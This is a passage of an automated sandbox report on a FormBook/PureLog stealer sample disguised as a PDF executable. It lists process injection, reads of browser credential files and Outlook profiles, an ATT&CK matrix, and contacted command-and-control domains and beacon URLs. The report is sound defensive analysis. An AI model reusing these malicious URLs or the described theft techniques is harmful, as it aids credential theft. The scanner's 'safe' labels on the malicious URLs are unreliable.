                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory written: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: NULL target: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\mountvol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: NULL target: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: NULL target: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                    Modifies the context of a thread in another process (thread injection)
                    Source: C:\Windows\SysWOW64\mountvol.exeThread register set: target process: 4936Jump to behavior
                    Queues an APC in another process (thread injection)
                    Source: C:\Windows\SysWOW64\mountvol.exeThread APC queued: target process: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess created: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exeProcess created: C:\Windows\SysWOW64\mountvol.exe "C:\Windows\SysWOW64\mountvol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                    Source: EnLuReulIds.exe, 00000005.00000002.3912862125.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000000.1693038446.0000000001A91000.00000002.00000001.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3912966500.00000000012C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeQueries volume information: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1433265991.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\mountvol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1433265991.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		412
                    Process Injection                    		11
                    Masquerading                    		1
                    OS Credential Dumping                    		121
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    Abuse Elevation Control Mechanism                    		1
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		41
                    Virtualization/Sandbox Evasion                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Deobfuscate/Decode Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Abuse Elevation Control Mechanism                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
                    Obfuscated Files or Information                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                    Software Packing                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562315 Sample: DO-COSU6387686280.pdf.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 31 www.futuru.xyz 2->31 33 www.zxyck.net 2->33 35 15 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 10 other signatures 2->53 10 DO-COSU6387686280.pdf.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\...\DO-COSU6387686280.pdf.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 DO-COSU6387686280.pdf.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 EnLuReulIds.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 mountvol.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 EnLuReulIds.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.bioland.app 202.61.233.66, 49714, 80 TH-AS-APTianhaiInfoTechCN Australia 23->37 39 officinadelpasso.shop 195.110.124.133, 49730, 49731, 49732 REGISTER-ASIT Italy 23->39 41 11 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DO-COSU6387686280.pdf.exe39%ReversingLabsWin32.Trojan.Generic
                    DO-COSU6387686280.pdf.exe100%AviraHEUR/AGEN.1307446
                    DO-COSU6387686280.pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.sankan-fukushi.info/qq1e/?UbRxm=DayBJHTwMg56rcld9n6KWZbVQKFRYd6Y2OVvMB/QfV+VoLW2vz3Ysj2Lu1Mz5EvoA06VXqhN10X9MeLBCKiZ8LZ2VXddbMNCxmaFYlM5w9+CsZ6D34cvk8XDh8Pk/EneAg==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)0%Avira URL Cloudsafe
                    http://www.supernutra01.online/ipdr/?UbRxm=aqsMELEoVHYTBvrjaGL2RPOv1CWpxeit3T8CA32c3b1KGgngGePyFU4WnP+JT+CjtUjsMbMtl8M87Wzmg5dknNnagRNh5+9+QvGqF8xbYvDN2Ssh6AjGLaQoW3ut45K01w==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.oztalkshw.store/3agz/0%Avira URL Cloudsafe
                    http://www.samundri.online/5kax/0%Avira URL Cloudsafe
                    https://pepabo.com/0%Avira URL Cloudsafe
                    http://www.kkpmoneysocial.top/dlkm/?UbRxm=h4lwGEVwdKAie/3i69ZS5ajdX7DevTN5l7rCLvUsWI5Ax6oJIVJyRtoh5SGHiRwIVgG3mVQ8/tYP0qqkAkm1lhwb/KkDwsT64i8O6GgUd051zcV49WQ+HPRS7BJ45XoE1w==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.krshop.shop/grhe/0%Avira URL Cloudsafe
                    http://www.oztalkshw.store0%Avira URL Cloudsafe
                    http://www.zxyck.net/z2jp/?UbRxm=OHC+NpFe2K8jmTlicXvXjJ+QVEgSatfCtasqPMFJtNXA1CIQdaIwTH1aekp09+pbZOA1peX5og6OyDAWYalTXTww0fqX4q90/3pIZSi2lNK2VQoZjt3+Z09NDWePsk/Y+A==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.krshop.shop/grhe/?UbRxm=AHRdWC0KZWrjxYC0KXJ/Pc0Ifc3a5dIjcNypL3DdH/M5f69FO55V4y/zfqI4/XMCrlXFD3GasOekPJK0GQB6Xv0fwrTDR9rlUwQmGtKqhkKLqQH5fcp3eHuY6Kvt/u2Y7w==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    https://files.reg.ru/fonts/inter/Inter-Regular.woff)0%Avira URL Cloudsafe
                    http://www.samundri.online/5kax/?UbRxm=kHRDn+Od6RtwHubD3E4pw9JaMFUU2DIijxVB6CtFbwBz/SAX/B3t7cttXyp9BuzPrv9CCpl0ygq2nuEhZlB9cUHvF/n6EPGCDxKUJTRdD4WbzDcOj2b0xy5K4x5io8krBQ==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.officinadelpasso.shop/te2d/?UbRxm=YRrrocWQCJ4z5Wo4Hyii3lnusY6IScX2szwquVJanj4zZRsRM51rBmkRCj7FWFPYdGZcOIeAVFgSZdyx5BBHZnzVg/hu/fGyJb1Cl3lRDP19pEGPrlJr8lwvIP2DjfyM2w==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.callyur.shop/dmly/0%Avira URL Cloudsafe
                    http://www.futuru.xyz/8uep/0%Avira URL Cloudsafe
                    https://support.lolipop.jp/hc/ja/articles/3600491329530%Avira URL Cloudsafe
                    https://files.reg.ru/fonts/inter/Inter-Medium.woff2)0%Avira URL Cloudsafe
                    http://www.supernutra01.online/ipdr/0%Avira URL Cloudsafe
                    http://www.callyur.shop/dmly/?YvA4=xnL8AvI8CJiPEDU&UbRxm=TxJb7MA4bghX/lTZi4FFUnx8X5IvqZr5NBwuw2qLyVi8/oqCfZzrCw4HdVl5+7DfFNR6jxv9e9mG0XYoVmaYbw3qmnHIup/BR6FUCIQOGhPMZ/gsWiB/XFVGgfvbM52XoA==0%Avira URL Cloudsafe
                    https://2domains.ru0%Avira URL Cloudsafe
                    http://www.yhj12.one/bi55/0%Avira URL Cloudsafe
                    https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)0%Avira URL Cloudsafe
                    https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=4040%Avira URL Cloudsafe
                    http://www.yhj12.one/bi55/?UbRxm=9VfqSJPbhh1HsXnTkF+U6adH/BnqBZbub0jDgAwJrnxzr9B3JVfn3uPZcB9gesjtADmpDWZfolEsGVNmGAi6MiyGQ6YANno90wBnX2TfwVwXOUx5FI/nfHL1eW4WOSittQ==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.oztalkshw.store/3agz/?YvA4=xnL8AvI8CJiPEDU&UbRxm=M9KkYvXJQvTAdDL0N809Af0gFgx9ZbNQHhlIdroNnVkJjfd2I5bhi/bs41o8FjJgMZ4GFKyENsY1nw3d8RcMg+XWHrwZPIIO2wtMzeZ/v8QmuglPj4pAgM6ngctNURE5tA==0%Avira URL Cloudsafe
                    http://www.futuru.xyz/8uep/?UbRxm=c2pj5XzU4r8mroY+x9nXsVmXiRTTvEExFimN19zxWLYZcfwNZM3Ctl+xWcy7JvpSNCmS4f8+1JlLQGO0Hv+UiSuhGSb748cjOyYKQpOu9XZhhnIssQky4Xxuz1j9m1caEA==&YvA4=xnL8AvI8CJiPEDU0%Avira URL Cloudsafe
                    http://www.iner-tech.online/2qq5/0%Avira URL Cloudsafe
                    http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif0%Avira URL Cloudsafe
                    http://www.sankan-fukushi.info/qq1e/0%Avira URL Cloudsafe
                    https://files.reg.ru/fonts/inter/Inter-Medium.woff)0%Avira URL Cloudsafe
                    http://www.kkpmoneysocial.top/dlkm/0%Avira URL Cloudsafe
                    https://files.reg.ru/fonts/inter/Inter-Regular.woff2)0%Avira URL Cloudsafe
                    http://www.zxyck.net/z2jp/0%Avira URL Cloudsafe
                    http://www.officinadelpasso.shop/te2d/0%Avira URL Cloudsafe
                    http://www.bioland.app/0322/?YvA4=xnL8AvI8CJiPEDU&UbRxm=HxR1FeZHXJ7BSqCS3fD8mQxxaJumBZenc9dO7nNnWiW1TdG8ymlkgtRZzCsH8EsCxrgxn7fyxa4U+0BCWK8lvrgV1wD4C6X04kpiBTwqtuBdGQan/Ge0WLc1tZ3QEOC6mw==0%Avira URL Cloudsafe
                    https://server118.hosting.reg.ru/manager0%Avira URL Cloudsafe
                    https://static.minne.com/files/banner/minne_600x5000%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    www.yhj12.one
                    		38.181.21.85
                    		truetrue
                      		unknown
                      www.bioland.app
                      		202.61.233.66
                      		truetrue
                        		unknown
                        www.kkpmoneysocial.top
                        		172.67.129.38
                        		truetrue
                          		unknown
                          www.supernutra01.online
                          		104.21.24.198
                          		truefalse
                            		high
                            www.krshop.shop
                            		13.248.169.48
                            		truetrue
                              		unknown
                              callyur.shop
                              		66.29.137.10
                              		truetrue
                                		unknown
                                www.iner-tech.online
                                		37.140.192.206
                                		truetrue
                                  		unknown
                                  www.oztalkshw.store
                                  		199.59.243.227
                                  		truetrue
                                    		unknown
                                    www.fantastica.digital
                                    		194.58.112.174
                                    		truetrue
                                      		unknown
                                      www.futuru.xyz
                                      		209.74.77.109
                                      		truetrue
                                        		unknown
                                        www.zxyck.net
                                        		118.107.250.103
                                        		truetrue
                                          		unknown
                                          officinadelpasso.shop
                                          		195.110.124.133
                                          		truetrue
                                            		unknown
                                            samundri.online
                                            		84.32.84.32
                                            		truetrue
                                              		unknown
                                              www.sankan-fukushi.info
                                              		163.44.185.183
                                              		truetrue
                                                		unknown
                                                www.officinadelpasso.shop
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.samundri.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.callyur.shop
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.krshop.shop/grhe/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.supernutra01.online/ipdr/?UbRxm=aqsMELEoVHYTBvrjaGL2RPOv1CWpxeit3T8CA32c3b1KGgngGePyFU4WnP+JT+CjtUjsMbMtl8M87Wzmg5dknNnagRNh5+9+QvGqF8xbYvDN2Ssh6AjGLaQoW3ut45K01w==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.samundri.online/5kax/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zxyck.net/z2jp/?UbRxm=OHC+NpFe2K8jmTlicXvXjJ+QVEgSatfCtasqPMFJtNXA1CIQdaIwTH1aekp09+pbZOA1peX5og6OyDAWYalTXTww0fqX4q90/3pIZSi2lNK2VQoZjt3+Z09NDWePsk/Y+A==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kkpmoneysocial.top/dlkm/?UbRxm=h4lwGEVwdKAie/3i69ZS5ajdX7DevTN5l7rCLvUsWI5Ax6oJIVJyRtoh5SGHiRwIVgG3mVQ8/tYP0qqkAkm1lhwb/KkDwsT64i8O6GgUd051zcV49WQ+HPRS7BJ45XoE1w==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sankan-fukushi.info/qq1e/?UbRxm=DayBJHTwMg56rcld9n6KWZbVQKFRYd6Y2OVvMB/QfV+VoLW2vz3Ysj2Lu1Mz5EvoA06VXqhN10X9MeLBCKiZ8LZ2VXddbMNCxmaFYlM5w9+CsZ6D34cvk8XDh8Pk/EneAg==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.oztalkshw.store/3agz/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.krshop.shop/grhe/?UbRxm=AHRdWC0KZWrjxYC0KXJ/Pc0Ifc3a5dIjcNypL3DdH/M5f69FO55V4y/zfqI4/XMCrlXFD3GasOekPJK0GQB6Xv0fwrTDR9rlUwQmGtKqhkKLqQH5fcp3eHuY6Kvt/u2Y7w==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.officinadelpasso.shop/te2d/?UbRxm=YRrrocWQCJ4z5Wo4Hyii3lnusY6IScX2szwquVJanj4zZRsRM51rBmkRCj7FWFPYdGZcOIeAVFgSZdyx5BBHZnzVg/hu/fGyJb1Cl3lRDP19pEGPrlJr8lwvIP2DjfyM2w==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.callyur.shop/dmly/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.samundri.online/5kax/?UbRxm=kHRDn+Od6RtwHubD3E4pw9JaMFUU2DIijxVB6CtFbwBz/SAX/B3t7cttXyp9BuzPrv9CCpl0ygq2nuEhZlB9cUHvF/n6EPGCDxKUJTRdD4WbzDcOj2b0xy5K4x5io8krBQ==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.supernutra01.online/ipdr/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.callyur.shop/dmly/?YvA4=xnL8AvI8CJiPEDU&UbRxm=TxJb7MA4bghX/lTZi4FFUnx8X5IvqZr5NBwuw2qLyVi8/oqCfZzrCw4HdVl5+7DfFNR6jxv9e9mG0XYoVmaYbw3qmnHIup/BR6FUCIQOGhPMZ/gsWiB/XFVGgfvbM52XoA==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.futuru.xyz/8uep/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.yhj12.one/bi55/?UbRxm=9VfqSJPbhh1HsXnTkF+U6adH/BnqBZbub0jDgAwJrnxzr9B3JVfn3uPZcB9gesjtADmpDWZfolEsGVNmGAi6MiyGQ6YANno90wBnX2TfwVwXOUx5FI/nfHL1eW4WOSittQ==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.yhj12.one/bi55/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.sankan-fukushi.info/qq1e/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.oztalkshw.store/3agz/?YvA4=xnL8AvI8CJiPEDU&UbRxm=M9KkYvXJQvTAdDL0N809Af0gFgx9ZbNQHhlIdroNnVkJjfd2I5bhi/bs41o8FjJgMZ4GFKyENsY1nw3d8RcMg+XWHrwZPIIO2wtMzeZ/v8QmuglPj4pAgM6ngctNURE5tA==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.iner-tech.online/2qq5/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.futuru.xyz/8uep/?UbRxm=c2pj5XzU4r8mroY+x9nXsVmXiRTTvEExFimN19zxWLYZcfwNZM3Ctl+xWcy7JvpSNCmS4f8+1JlLQGO0Hv+UiSuhGSb748cjOyYKQpOu9XZhhnIssQky4Xxuz1j9m1caEA==&YvA4=xnL8AvI8CJiPEDUtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kkpmoneysocial.top/dlkm/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zxyck.net/z2jp/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.officinadelpasso.shop/te2d/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
